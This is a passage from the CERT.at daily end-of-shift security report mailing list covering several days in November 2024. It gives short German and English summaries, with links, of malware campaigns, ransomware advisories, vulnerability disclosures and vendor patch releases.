https://www.heise.de/news/Sicherheitsupdates-Zoom-Room-Client-Co-angreifbar… ∗∗∗ Global Companies Are Unknowingly Paying North Koreans: Here’s How to Catch Them ∗∗∗ --------------------------------------------- We discuss North Koreas use of IT workers to infiltrate companies, detailing detection strategies like IT asset management and IP analysis to counter this. --------------------------------------------- https://unit42.paloaltonetworks.com/north-korean-it-workers/ ∗∗∗ The November 2024 Security Update Review ∗∗∗ --------------------------------------------- It’s not quite the holiday season, despite what some early decorators will have you believe. It is the second Tuesday of the month, and that means Adobe and Microsoft have released their regularly scheduled updates. Take a break from your regular activities and join us as we review the details of their latest security alerts.If you’d rather watch the .. --------------------------------------------- https://www.thezdi.com/blog/2024/11/12/the-november-2024-security-update-re… ∗∗∗ How Italy became an unexpected spyware hub ∗∗∗ --------------------------------------------- Italy is home to six major spyware vendors and one supplier, with many smaller and harder-to-track enterprises emerging all the time, experts say. --------------------------------------------- https://therecord.media/how-italy-became-an-unexpected-spyware-hub ∗∗∗ Germany warns of potential cyber threats from Russia ahead of snap election ∗∗∗ --------------------------------------------- “We must be especially prepared against threats like hacker attacks, manipulation, and disinformation," German Interior Minister Nancy Faeser said. --------------------------------------------- https://therecord.media/germany-cyber-threats-russia-elections ∗∗∗ Silent Threat: Red Team Tool EDRSilencer Disrupting Endpoint Security Solutions ∗∗∗ --------------------------------------------- Trend Micros Threat Hunting Team has observed EDRSilencer, a red team tool that threat actors are attempting to abuse for its ability to block EDR traffic and conceal malicious activity. --------------------------------------------- https://www.trendmicro.com/en_us/research/24/j/edrsilencer-disrupting-endpo… ∗∗∗ Bitdefender Finds New ShrinkLocker Ransomware, Releases Its Decryptor Tool ∗∗∗ --------------------------------------------- Bitdefender has released a free decryptor for ShrinkLocker ransomware, which exploits Windows BitLocker to encrypt .. --------------------------------------------- https://hackread.com/bitdefender-shrinklocker-ransomware-decryptor-tool/ ∗∗∗ Emerging Threats: Cybersecurity Forecast 2025 ∗∗∗ --------------------------------------------- Every November, we start sharing forward-looking insights on threats and other cybersecurity topics to help organizations and defenders prepare for the year ahead. The Cybersecurity Forecast 2025 report, available today, plays a big role in helping us accomplish this mission.This year’s report draws on insights directly from Google .. --------------------------------------------- https://cloud.google.com/blog/topics/threat-intelligence/cybersecurity-fore… ∗∗∗ Defending Your Directory: An Expert Guide to Fortifying Active Directory Certificate Services (ADCS) Against Exploitation ∗∗∗ --------------------------------------------- In our latest technical blog series, our DFIR team are highlighting the most prominent Active Directory (AD) threats, describing the tell-tale signs that your AD might be at risk, and give experienced insight into the best prevention and mitigation strategies to shore up your AD security and bolster your digital identity protection. --------------------------------------------- https://www.nccgroup.com/us/research-blog/defending-your-directory-an-exper… ∗∗∗ Making Sense of Kubernetes Initial Access Vectors Part 1 – Control Plane ∗∗∗ --------------------------------------------- Explore Kubernetes control plane access vectors, risks, and security strategies to prevent unauthorized access and protect your clusters from potential threats. --------------------------------------------- https://www.wiz.io/blog/making-sense-of-kubernetes-initial-access-vectors-p… ∗∗∗ Time Boxed Penetration Testing for Web Applications ∗∗∗ --------------------------------------------- This article defines time boxed penetration testing and explains how it’s approached from a methodological standpoint. By focusing on high-risk areas, client-specific priorities, and sampling, time boxed testing can deliver efficient assessments within a limited timeframe. --------------------------------------------- https://projectblack.io/blog/time-boxed-penetration-testing/ ∗∗∗ Killing Filecoin nodes ∗∗∗ --------------------------------------------- By Simone Monica In January, we identified and reported a vulnerability in the Lotus and Venus clients of the Filecoin network that allowed an attacker to remotely crash a node and trigger a denial of service. This issue is .. --------------------------------------------- https://blog.trailofbits.com/2024/11/13/killing-filecoin-nodes/ ∗∗∗ Fault Injection – Down the Rabbit Hole ∗∗∗ --------------------------------------------- This series of articles describes fault injection attack techniques in order to understand their real potential by testing their limits and applicability with limited hardware (available on the market at an acceptable cost). It explores possible ways of using an attack that, in my opinion, is greatly underestimated. --------------------------------------------- https://security.humanativaspa.it/fault-injection-down-the-rabbit-hole/ ===================== = Vulnerabilities = ===================== ∗∗∗ Security updates for Wednesday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (expat), Fedora (chromium and golang-github-nvidia-container-toolkit), Mageia (curl, expat, mpg123, networkmanager-libreswan, openssl, php-tcpdf, qbittorrent, and x11-server, x11-server-xwayland, and tigervnc), Red Hat (kernel and libsoup), Slackware (mozilla), SUSE (firefox, kernel, python-PyPDF2, and xen), and Ubuntu (dotnet9, ghostscript, linux-aws, linux-oem-6.8, and pydantic). --------------------------------------------- https://lwn.net/Articles/998044/ ∗∗∗ ZDI-24-1472: Veeam Backup Enterprise Manager AuthorizeByVMwareSsoToken Improper Certificate Validation Authentication Bypass Vulnerability ∗∗∗ --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-24-1472/ ∗∗∗ ZDI-24-1486: (0Day) G DATA Total Security Incorrect Permission Assignment Local Privilege Escalation Vulnerability ∗∗∗ --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-24-1486/ ∗∗∗ Critical Security Vulnerabilities Discovered in MZ Automation’s MMS Client ∗∗∗ --------------------------------------------- https://encs.eu/news/critical-security-vulnerabilities-discovered-in-mz-aut… ∗∗∗ Online Installer DLL Hijacking ∗∗∗ --------------------------------------------- https://fortiguard.fortinet.com/psirt/FG-IR-24-205 ∗∗∗ Fortinet Releases Security Updates for Multiple Products ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/alerts/2024/11/12/fortinet-releases-securi… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 12.11.2024
by Daily end-of-shift report 12 Nov '24

12 Nov '24

===================== = End-of-Day report = ===================== Timeframe: Montag 11-11-2024 18:00 − Dienstag 12-11-2024 18:00 Handler: Alexander Riepl Co-Handler: Michael Schlagenhaufer ===================== = News = ===================== ∗∗∗ Daten von Amazon-Mitarbeiter wurden in einem Hackerforum veröffentlicht ∗∗∗ --------------------------------------------- Der Datensatz dürfte von einem Immobilienverwalter stammen und auf die kritische Lücke in der Software von Moveit zurückgehen --------------------------------------------- https://www.derstandard.at/story/3000000244555/daten-von-amazon-mitarbeiter… ∗∗∗ ModeLeak: Privilege Escalation to LLM Model Exfiltration in Vertex AI ∗∗∗ --------------------------------------------- New research reveals two vulnerabilities in Googles Vertex AI that may lead to privilege escalation or data theft through custom jobs or malicious models. --------------------------------------------- https://unit42.paloaltonetworks.com/privilege-escalation-llm-model-exfil-ve… ∗∗∗ 2023 Top Routinely Exploited Vulnerabilities ∗∗∗ --------------------------------------------- This advisory provides details, collected and compiled by the authoring agencies, on the Common Vulnerabilities and Exposures (CVEs) routinely and frequently exploited by malicious cyber actors in 2023 and their associated Common Weakness Enumerations (CWEs). Malicious cyber actors exploited more zero-day vulnerabilities to compromise .. --------------------------------------------- https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-317a ∗∗∗ Building a Resilient Network Architecture: Key Trends for 2025 ∗∗∗ --------------------------------------------- As organizations continue to align their operational strategies with evolving digital ecosystems and technologies, the concept of network resilience has become a priority. A major mindset shift is that modern networks must be designed not just for speed and efficiency but also for flexibility, security, and the ability to hold out against .. --------------------------------------------- https://levelblue.com/blogs/security-essentials/building-a-resilient-networ… ∗∗∗ LodaRAT: Established malware, new victim patterns ∗∗∗ --------------------------------------------- Rapid7 has observed an ongoing malware campaign involving a new version of LodaRAT. This version possesses the ability to steal cookies and passwords from Microsoft Edge and Brave. --------------------------------------------- https://www.rapid7.com/blog/post/2024/11/12/lodarat-established-malware-new… ∗∗∗ ICS Security Is a Team Sport ∗∗∗ --------------------------------------------- Brandon Smith discusses some of the challenges an Automation Engineer face, Bitsights partnership with Schneider Electric, and what manufacturers in general are doing to tackle ICS security. --------------------------------------------- https://www.bitsight.com/blog/ics-security-team-sport ∗∗∗ Visionaries Have Democratised Remote Network Access - Citrix Virtual Apps and Desktops (CVE Unknown) ∗∗∗ --------------------------------------------- Well, we’re back again, with yet another fresh-off-the-press bug chain (and associated Interactive Artifact Generator). This time, it’s in Citrix’s “Virtual Apps and Desktops” offering. --------------------------------------------- https://labs.watchtowr.com/visionaries-at-citrix-have-democratised-remote-n… ∗∗∗ SAP Patchday: Acht neue Sicherheitslücken, davon eine hochriskant ∗∗∗ --------------------------------------------- Admins können etwas entspannter auf den aktuellen SAP-Patchday schauen: Von acht neuen Sicherheitslücken gilt lediglich eine als hohes Risiko. --------------------------------------------- https://heise.de/-10020168 ∗∗∗ Attack of the Evil Baristas ∗∗∗ --------------------------------------------- I use the term “hacklore” to refer to the urban legends surrounding cybersecurity. Hacklore is everywhere, and this holiday season, you’re bound to hear it nonstop: “The Russians will load your phone with malware if you scan QR codes!” or “Hackers will steal your banking details if you use a USB charger at the airport!” and so on. --------------------------------------------- https://medium.com/@boblord/attack-of-the-evil-baristas-b204436f0853 ∗∗∗ Reverse Engineering: Finding Exploits in Video Games ∗∗∗ --------------------------------------------- In this guide, I'll walk you through how I create tools to find exploits in video games for bug bounty programs. Specifically, I'll focus on my research into the game Sword of Convallaria. This exploration is purely for educational purposes. As such, I have removed some of the assets as an exercise for .. --------------------------------------------- https://shalzuth.com/Blog/FindingExploitsInGames ∗∗∗ Critical WPLMS WordPress Theme Vulnerability Puts Websites at Risk of RCE Attacks ∗∗∗ --------------------------------------------- A newly discovered vulnerability in the WPLMS WordPress theme threatens websites with potential Remote Code Execution (RCE) due to a critical path traversal flaw. CVE-2024-10470, a vulnerability in the WPLMS .. --------------------------------------------- https://thecyberexpress.com/critical-wplms-wordpress-theme-vulnerability/ ∗∗∗ Harnessing Chisel for Covert Operations: Unpacking a Multi-Stage PowerShell Campaign ∗∗∗ --------------------------------------------- The Cyble Research and Intelligence Lab (CRIL) has recently uncovered a sophisticated multi-stage infection chain, primarily driven by PowerShell scripts. This campaign, which targets organizations through a variety of .. --------------------------------------------- https://thecyberexpress.com/new-powershell-campaign/ ===================== = Vulnerabilities = ===================== ∗∗∗ Security updates for Tuesday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (gstreamer1-plugins-base), Debian (chromium, ghostscript, libarchive, mpg123, ruby-saml, and symfony), Fedora (buildah and podman), Red Hat (buildah, containernetworking-plugins, podman, skopeo, and xorg-x11-server-Xwayland), Slackware (wget), SUSE (pcp), and Ubuntu (linux, linux-aws-5.15, linux-gcp, linux-gcp-5.15, linux-gke, linux-gkeop, linux-gkeop-5.15, linux-hwe-5.15, linux-ibm, linux-ibm-5.15, linux-kvm, .. --------------------------------------------- https://lwn.net/Articles/997903/ ∗∗∗ Citrix Releases Security Updates for NetScaler and Citrix Session Recording ∗∗∗ --------------------------------------------- Citrix released security updates to address multiple vulnerabilities in NetScaler ADC, NetScaler Gateway, and Citrix Session Recording. A cyber threat actor could exploit some of these vulnerabilities to take control .. --------------------------------------------- https://www.cisa.gov/news-events/alerts/2024/11/12/citrix-releases-security… ∗∗∗ November Security Update ∗∗∗ --------------------------------------------- At Ivanti, our top priority is upholding our commitment to deliver and maintain secure products for our customers. Our vulnerability management program is designed to enable us to find, fix and disclose vulnerabilities in collaboration with the broader security ecosystem, and communicate responsibly and transparently with customers. Ivanti is .. --------------------------------------------- https://www.ivanti.com/blog/november-2024-security-update ∗∗∗ XSA-464 ∗∗∗ --------------------------------------------- https://xenbits.xen.org/xsa/advisory-464.html ∗∗∗ XSA-463 ∗∗∗ --------------------------------------------- https://xenbits.xen.org/xsa/advisory-463.html ∗∗∗ Mehrere Schwachstelen in Siemens Energy Omnivise T3000 ∗∗∗ --------------------------------------------- https://sec-consult.com/de/vulnerability-lab/advisory/mehrere-schwachstelen… ∗∗∗ Zyxel security advisory for post-authentication command injection and buffer overflow vulnerabilities in GS1900 series switches ∗∗∗ --------------------------------------------- https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 11.11.2024
by Daily end-of-shift report 11 Nov '24

11 Nov '24

===================== = End-of-Day report = ===================== Timeframe: Freitag 08-11-2024 18:00 − Montag 11-11-2024 18:00 Handler: Alexander Riepl Co-Handler: Michael Schlagenhaufer ===================== = News = ===================== ∗∗∗ Palo Alto untersucht mögliche Sicherheitslücke in PAN-OS-Webinterface ∗∗∗ --------------------------------------------- Palo Alto untersucht eine angebliche Codeschmuggel-Lücke in der Verwaltungsoberfläche von PAN-OS. Ein Teil betroffener Kunden wird informiert. [..] Palo Alto empfiehlt Kunden dringend, sicherzustellen, dass der Zugang zur Verwaltungsoberfläche korrekt und im Einklang mit den empfohlenen Best-Practices-Richtlinien erfolgt. Dafür stellt das Unternehmen auch eine Anleitung bereit. --------------------------------------------- https://www.heise.de/-10013896.html ∗∗∗ Zugangsdaten aus 2023 für Zugriff ausgenutzt - "Helldown Leaks"-Ransomware kompromittiert Unternehmen über Zyxel-Firewalls ∗∗∗ --------------------------------------------- Seit etwa Anfang August 2024 werden international Unternehmen durch die Ransomware-Gruppe "Helldown Leaks" verschlüsselt. Als initialer Angriffsvektor können durchgängig Zyxel-Firewalls ausgemacht werden, selbst wenn diese auf dem letzten Software-Stand sind. --------------------------------------------- https://www.cert.at/de/aktuelles/2024/11/zugangsdaten-aus-2023-fur-zugriff-… ∗∗∗ Testing the Koord2ool ∗∗∗ --------------------------------------------- As part of the EU-funded project “AWAKE”, we built the Koord2ool, which is a tool that allowed us to track the state of an incident across our constituency over time. We implemented this application as an extension to LimeSurvey (an Open Source survey tool) which generates a dashboard to visualize the state of the answers over time. --------------------------------------------- https://www.cert.at/en/blog/2024/11/testing-the-koord2ool ∗∗∗ Cybercriminals Use Excel Exploit to Spread Fileless Remcos RAT Malware ∗∗∗ --------------------------------------------- Cybersecurity researchers have discovered a new phishing campaign that spreads a new fileless variant of known commercial malware called Remcos RAT. [..] The malicious Excel document is designed to exploit a known remote code execution flaw in Office (CVE-2017-0199, CVSS score: 7.8) to download an HTML Application (HTA) file ("cookienetbookinetcahce.hta") from a remote server ("192.3.220[.]22") and launch it using mshta.exe. --------------------------------------------- https://thehackernews.com/2024/11/cybercriminals-use-excel-exploit-to.html ∗∗∗ #StopRansomware: Black Basta ∗∗∗ --------------------------------------------- Updates to this advisory, originally published May 10, 2024 [..] The advisory was updated to reflect new TTPs employed by Black Basta affiliates, as well as provide current IOCs/remove outdated IOCs for effective threat hunting. --------------------------------------------- https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-131a ∗∗∗ Cyberattack causes credit card readers to malfunction in Israel ∗∗∗ --------------------------------------------- As reported by the Jerusalem Post, the cause was a distributed denial-of-service attack (DDoS) that targeted the payment gateway company Hyp’s CreditGuard product. The attack disrupted communications between the card terminals and the wider payment system, but was not capable of stealing information or payments. --------------------------------------------- https://therecord.media/cyberattack-causes-credit-card-readers-in-israel-to… ∗∗∗ Malware Steals Account Credentials ∗∗∗ --------------------------------------------- It’s common for malware to target e-commerce sites, and these attackers are usually seeking to steal credit card details. In most cases, they will insert scripts that extract data from the checkout forms to siphon fields like the cardholder name, card number and expiration date. [..] However, every now and then we encounter a case where in addition to that they are also looking to steal details for accounts that customers have created on these sites along with admin account credentials. We’ll explore one such case. --------------------------------------------- https://blog.sucuri.net/2024/11/malware-steals-account-credentials.html ∗∗∗ Known Attacks On Elliptic Curve Cryptography ∗∗∗ --------------------------------------------- In recent years the Elliptic Curve Cryptography approach has become popular due to its high efficiency and strong security. The purpose of this article is to present this topic in a relatively clearer way than it exists today on the internet. --------------------------------------------- https://github.com/elikaski/ECC_Attacks ∗∗∗ Pishi: Coverage guided macOS KEXT fuzzing ∗∗∗ --------------------------------------------- In this blog post I will try to explain everything as clearly as possible so that even those who are not familiar with fuzzing can enjoy and understand it. I’ll break down the concepts, provide relatable examples, and resources, My goal is to make fuzzing approachable and interesting. --------------------------------------------- https://r00tkitsmm.github.io/fuzzing/2024/11/08/Pishi.html ===================== = Vulnerabilities = ===================== ∗∗∗ Veeam Backup Enterprise Manager: Unbefugte Zugriffe durch Angreifer möglich ∗∗∗ --------------------------------------------- Setzen Angreifer erfolgreich an der Schwachstelle (CVE-2024-40715 "hoch") an, können sie die Authentifizierung umgehen und Verbindungen als Man-in-the-Middle belauschen. Wie das im Detail ablaufen könnte, ist bislang nicht bekannt. [..] Ein Sicherheitspatch steht zum Download bereit. --------------------------------------------- https://www.heise.de/-10018234.html ∗∗∗ Security updates for Monday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (podman), Debian (guix, libarchive, and nss), Fedora (expat, iaito, opendmarc, python-werkzeug, radare2, squid, and xorg-x11-server), Mageia (htmldoc, libheif, nspr, nss, firefox & rust, python-urllib3, python-werkzeug, quictls, ruby-webrick, and thunderbird), Oracle (firefox and NetworkManager-libreswan), SUSE (apache2, chromedriver, chromium, coredns, expat, govulncheck-vulndb, httpcomponents-client, java-17-openjdk, java-21-openjdk, libheif, python-wxPython, python311, python312, qbittorrent, ruby3.3-rubygem-actionmailer, ruby3.3-rubygem-actiontext, ruby3.3-rubygem-puma, ruby3.3-rubygem-rails, and virtualbox), and Ubuntu (openjdk-17, openjdk-21, openjdk-8, openjdk-lts, and qemu). --------------------------------------------- https://lwn.net/Articles/997774/ -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 08.11.2024
by Daily end-of-shift report 08 Nov '24

08 Nov '24

===================== = End-of-Day report = ===================== Timeframe: Donnerstag 07-11-2024 18:00 − Freitag 08-11-2024 18:00 Handler: Alexander Riepl Co-Handler: Michael Schlagenhaufer ===================== = News = ===================== ∗∗∗ Google To Make MFA Mandatory for Google Cloud in 2025 ∗∗∗ --------------------------------------------- Google has recently announced that it plans to implement mandatory multi-factor authentication (MFA) on all Cloud accounts by the end of 2025. [..] The implementation will affect both admins and users with access to Google Cloud. General consumer Google accounts will not be affected. --------------------------------------------- https://heimdalsecurity.com/blog/google-cloud-mfa/ ∗∗∗ 2024 Credit Card Theft Season Arrives ∗∗∗ --------------------------------------------- In today’s post we’re going to perform a malware analysis of the most common MageCart injections identified so that eCommerce website owners can better understand the risks, and (hopefully) protect themselves, their websites, and their customers from attackers. --------------------------------------------- https://blog.sucuri.net/2024/11/2024-credit-card-theft-season-arrives.html ∗∗∗ ESET APT Activity Report Q2 2024–Q3 2024 ∗∗∗ --------------------------------------------- An overview of the activities of selected APT groups investigated and analyzed by ESET Research in Q2 2024 and Q3 2024 --------------------------------------------- https://www.welivesecurity.com/en/eset-research/eset-apt-activity-report-q2… ∗∗∗ Helldown Ransomware Group – A New Emerging Ransomware Threat ∗∗∗ --------------------------------------------- As of November 2024, the online resources available related to the Helldown ransomware group’s Tactics Techniques and Procedures (TTP’s) were effectively none-existent – this blogpost aims to address that and will be updated continuously as more investigations are completed. --------------------------------------------- https://www.truesec.com/hub/blog/helldown-ransomware-group ∗∗∗ TLPT & ME: Everything you need to know about Threat-Led Penetration Testing (TLPT) in a TIBER world. ∗∗∗ --------------------------------------------- While the TLPT RTS does come with some additional requirements or nuances compared to the TIBER framework, we can all be certain that adopting TIBER is indeed the way to fulfill DORA’s TLPT requirements. As mentioned in our initial post, we expect many more European countries to publish a TIBER implementation guide and/or a TIBER-EU 2.0 to be published for additional convergence. --------------------------------------------- https://blog.nviso.eu/2024/11/08/tlpt-me-everything-you-need-to-know-about-… ∗∗∗ Breaking Down Earth Estries Persistent TTPs in Prolonged Cyber Operations ∗∗∗ --------------------------------------------- Discover how Earth Estries employs a diverse set of tactics, techniques, and tools, including malware such as Zingdoor and Snappybee, for its campaigns. --------------------------------------------- https://www.trendmicro.com/en_us/research/24/k/breaking-down-earth-estries-… ∗∗∗ Defending Your Directory: An Expert Guide to Securing Active Directory Against DCSync Attacks ∗∗∗ --------------------------------------------- Last time we took a dive deep into Kerberoasting. Up next, let's unravel the sinister secrets of DCSync attacks - a stealthy technique that can bring your entire Active Directory to its knees. --------------------------------------------- https://www.nccgroup.com/us/research-blog/defending-your-directory-an-exper… ∗∗∗ Nameless and shameless: Ransomware Encryption via BitLocker ∗∗∗ --------------------------------------------- This post will delve into a recent incident response engagement handled by NCC Group’s Digital Forensics and Incident Response (DFIR) team, involving an unknown ransomware strain but known TTPs. --------------------------------------------- https://www.nccgroup.com/us/research-blog/nameless-and-shameless-ransomware… ∗∗∗ Unmasking Phishing: Strategies for identifying 0ktapus domains and beyond ∗∗∗ --------------------------------------------- Wiz Research looks at phishing tactics, along with how to trace and investigate these campaigns. --------------------------------------------- https://www.wiz.io/blog/unmasking-phishing-strategies-for-identifying-0ktap… ===================== = Vulnerabilities = ===================== ∗∗∗ Max-Critical Cisco Bug Enables Command-Injection Attacks ∗∗∗ --------------------------------------------- Though Cisco reports of no known malicious exploitation attempts, but thanks to a CVSS 10 out of 10 security vulnerability (CVE-2024-20418) three of its wireless access points are vulnerable to remote, unauthenticated cyberattacks. --------------------------------------------- https://www.darkreading.com/vulnerabilities-threats/cisco-bug-command-injec… ∗∗∗ Security updates for Friday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (edk2), Debian (webkit2gtk), Fedora (thunderbird), Oracle (bzip2, container-tools:ol8, edk2, go-toolset:ol8, libtiff, python-idna, python3.11, and python3.12), Slackware (expat), and SUSE (apache2, govulncheck-vulndb, grub2, java-1_8_0-openjdk, python3, python39, qemu, xorg-x11-server, and xwayland). --------------------------------------------- https://lwn.net/Articles/997480/ ∗∗∗ Delta Electronics DIAScreen ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/ics-advisories/icsa-24-312-02 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 07.11.2024
by Daily end-of-shift report 07 Nov '24

07 Nov '24

===================== = End-of-Day report = ===================== Timeframe: Mittwoch 06-11-2024 18:00 − Donnerstag 07-11-2024 18:00 Handler: Alexander Riepl Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Hackers increasingly use Winos4.0 post-exploitation kit in attacks ∗∗∗ --------------------------------------------- Hackers are increasingly targeting Windows users with the malicious Winos4.0 framework, distributed via seemingly benign game-related apps. --------------------------------------------- https://www.bleepingcomputer.com/news/security/hackers-increasingly-use-win… ∗∗∗ A look at the latest post-quantum signature standardization candidates ∗∗∗ --------------------------------------------- NIST has standardized four post-quantum signature schemes so far, and they’re not done yet: there are fourteen new candidates in the running for standardization. In this blog post we take .. --------------------------------------------- https://blog.cloudflare.com/another-look-at-pq-signatures ∗∗∗ The Power of Process in Creating a Successful Security Posture ∗∗∗ --------------------------------------------- Establishing realistic, practitioner-driven processes prevents employee burnout, standardizes experiences, and closes many of the gaps exposed by repeated one-offs. --------------------------------------------- https://www.darkreading.com/cybersecurity-operations/process-in-creating-su… ∗∗∗ Microsoft Windows Server 2025 Upgrade Triggers Licensing Conflicts and Operational Fallout ∗∗∗ --------------------------------------------- A recent Microsoft update has unexpectedly forced several organizations to upgrade from Windows Server 2022 to Windows Server 2025, resulting in unexpected licensing demands and operational setbacks. First reported on November 5, 2024, this incident has affected organizations .. --------------------------------------------- https://heimdalsecurity.com/blog/microsoft-windows-server-2025-upgrade/ ∗∗∗ Steam Account Checker Poisoned with Infostealer ∗∗∗ --------------------------------------------- I found an interesting script targeting Steam users. Steam[1] is a popular digital distribution platform for purchasing, downloading, and playing video games on personal computers. The script is called "steam-account-checker" .. --------------------------------------------- https://isc.sans.edu/forums/diary/Steam+Account+Checker+Poisoned+with+Infos… ∗∗∗ China-Aligned MirrorFace Hackers Target EU Diplomats with World Expo 2025 Bait ∗∗∗ --------------------------------------------- The China-aligned threat actor known as MirrorFace has been observed targeting a diplomatic organization in the European Union, marking the first time the hacking crew has targeted an organization in the region."During this attack, the threat .. --------------------------------------------- https://thehackernews.com/2024/11/china-aligned-mirrorface-hackers-target.h… ∗∗∗ North Korean Hackers Target Crypto Firms with Hidden Risk Malware on macOS ∗∗∗ --------------------------------------------- A threat actor with ties to the Democratic Peoples Republic of Korea (DPRK) has been observed targeting cryptocurrency-related businesses with a multi-stage malware capable of infecting Apple macOS devices.Cybersecurity company SentinelOne, .. --------------------------------------------- https://thehackernews.com/2024/11/north-korean-hackers-target-crypto.html ∗∗∗ Office unter Windows 11 24H2 mit installiertem Crowdstrike lahmgelegt ∗∗∗ --------------------------------------------- Wer Crowdstrike-Sicherheitssoftware einsetzt und auf Windows 11 24H2 aktualisiert hat, hatte womöglich mit nicht funktionierenden Apps zu kämpfen. --------------------------------------------- https://www.heise.de/news/Crowdstrike-legte-Office-unter-Windows-11-24H2-la… ∗∗∗ Large eBay malvertising campaign leads to scams ∗∗∗ --------------------------------------------- Consumers are being swamped by Google ads claiming to be eBays customer service. --------------------------------------------- https://www.malwarebytes.com/blog/scams/2024/11/large-ebay-malvertising-cam… ∗∗∗ Vorsicht vor gefälschten Willhaben-Mails ∗∗∗ --------------------------------------------- Kriminelle geben sich als Willhaben aus und versenden massenhaft gefälschte E-Mails. In den teilweise echt aussehenden E-Mails wird behauptet, dass Sie Ihre Identität bestätigen müssen oder eine Rückerstattung erhalten. Eine andere gefälschte E-Mail enthält im Anhang angeblich eine Rechnung. Wir raten zur Vorsicht! --------------------------------------------- https://www.watchlist-internet.at/news/willhaben-phishing/ ∗∗∗ Silent Skimmer Gets Loud (Again) ∗∗∗ --------------------------------------------- We discuss a new campaign from the cybercrime group behind Silent Skimmer, showcasing the exploit of ... --------------------------------------------- https://unit42.paloaltonetworks.com/silent-skimmer-latest-campaign/ ∗∗∗ Unwrapping the emerging Interlock ransomware attack ∗∗∗ --------------------------------------------- Cisco Talos Incident Response (Talos IR) recently observed an attacker conducting big-game .. --------------------------------------------- https://blog.talosintelligence.com/emerging-interlock-ransomware/ ∗∗∗ Androxgh0st Botnet Integrates Mozi, Expands Attacks on IoT Vulnerabilities ∗∗∗ --------------------------------------------- CloudSEK reports that the Androxgh0st botnet has integrated with the Mozi botnet and .. --------------------------------------------- https://hackread.com/androxgh0st-botnet-integrate-mozi-iot-vulnerabilities/ ∗∗∗ Malicious Python Package Typosquats Popular fabric SSH Library, Exfiltrates AWS Credentials ∗∗∗ --------------------------------------------- The Socket Research Team has discovered a malicious Python package, fabrice, that is typosquatting the popular fabric SSH automation library. The threat of malware delivered through typosquatted libraries remains a significant .. --------------------------------------------- https://socket.dev/blog/malicious-python-package-typosquats-fabric-ssh-libr… ===================== = Vulnerabilities = ===================== ∗∗∗ Zahlreiche Schwachstellen in HASOMED Elefant and Elefant Software Updater ∗∗∗ --------------------------------------------- https://sec-consult.com/de/vulnerability-lab/advisory/zahlreiche-schwachste… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 06.11.2024
by Daily end-of-shift report 06 Nov '24

06 Nov '24

===================== = End-of-Day report = ===================== Timeframe: Dienstag 05-11-2024 18:00 − Mittwoch 06-11-2024 18:00 Handler: Alexander Riepl Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Germany drafts law to protect researchers who find security flaws ∗∗∗ --------------------------------------------- The Federal Ministry of Justice in Germany has drafted a law to provide legal protection to security researchers who discover and responsibly report security vulnerabilities to vendors. --------------------------------------------- https://www.bleepingcomputer.com/news/security/germany-drafts-law-to-protec… ∗∗∗ Attackers Breach IT-Based Networks Before Jumping to ICS/OT Systems ∗∗∗ --------------------------------------------- SANS recently published its 2024 State of ICS.OT Cybersecurity report, highlighting the skills of cyber professionals working in critical infrastructure, budget estimates, and emerging technologies. The report .. --------------------------------------------- https://www.darkreading.com/ics-ot-security/attackers-breach-network-provid… ∗∗∗ Verbraucherschützer warnen: Smarte Fritteusen lauschen und senden Daten nach China ∗∗∗ --------------------------------------------- Verbraucherschützer haben bei verschiedenen smarten Geräten Datenschutzprobleme aufgedeckt. Ganz vorne mit dabei: Heißluftfritteusen! --------------------------------------------- https://www.golem.de/news/verbraucherschuetzer-warnen-smarte-fritteusen-lau… ∗∗∗ New SteelFox Trojan mimics software activators, stealing sensitive data and mining cryptocurrency ∗∗∗ --------------------------------------------- Kaspersky experts have discovered a new SteelFox Trojan that mimics popular software like Foxit PDF Editor and JetBrains to spread a stealer-and-miner bundle. --------------------------------------------- https://securelist.com/steelfox-trojan-drops-stealer-and-miner/114414/ ∗∗∗ INTERPOL Disrupts Over 22,000 Malicious Servers in Global Crackdown on Cybercrime ∗∗∗ --------------------------------------------- INTERPOL on Tuesday said it took down more than 22,000 malicious servers linked to various cyber threats as part of a global operation.Dubbed Operation Synergia II, the coordinated effort ran from April 1 to .. --------------------------------------------- https://thehackernews.com/2024/11/interpols-operation-synergia-ii.html ∗∗∗ Angreifer nutzen emulierte Linux-Umgebung als Backdoor ∗∗∗ --------------------------------------------- IT-Sicherheitsforscher haben eine ungewöhnliche Angriffsart entdeckt: Die Täter haben eine emulierte Linux-Umgebung als Backdoor eingerichtet. --------------------------------------------- https://www.heise.de/news/CRON-TRAP-Emulierte-Linux-Umgebung-als-Backdoor-n… ∗∗∗ Canadian Man Arrested in Snowflake Data Extortions ∗∗∗ --------------------------------------------- A 26-year-old man in Ontario, Canada has been arrested for allegedly stealing data from and extorting more than 160 companies that used the cloud data service Snowflake. On October 30, Canadian authorities arrested Alexander Moucka, a.k.a. Connor Riley Moucka of Kitchener, Ontario, on a provisional arrest warrant from the United States. Bloomberg first .. --------------------------------------------- https://krebsonsecurity.com/2024/11/canadian-man-arrested-in-snowflake-data… ∗∗∗ You lost your iPhone, but it’s locked. That’s fine, right? ∗∗∗ --------------------------------------------- TL;DR Default iOS configuration leaves your locked device vulnerable Ensure your emergency contacts are set. Use ‘FindMy’ to track / wipe lost devices. Take regular backups. Consider turning off the .. --------------------------------------------- 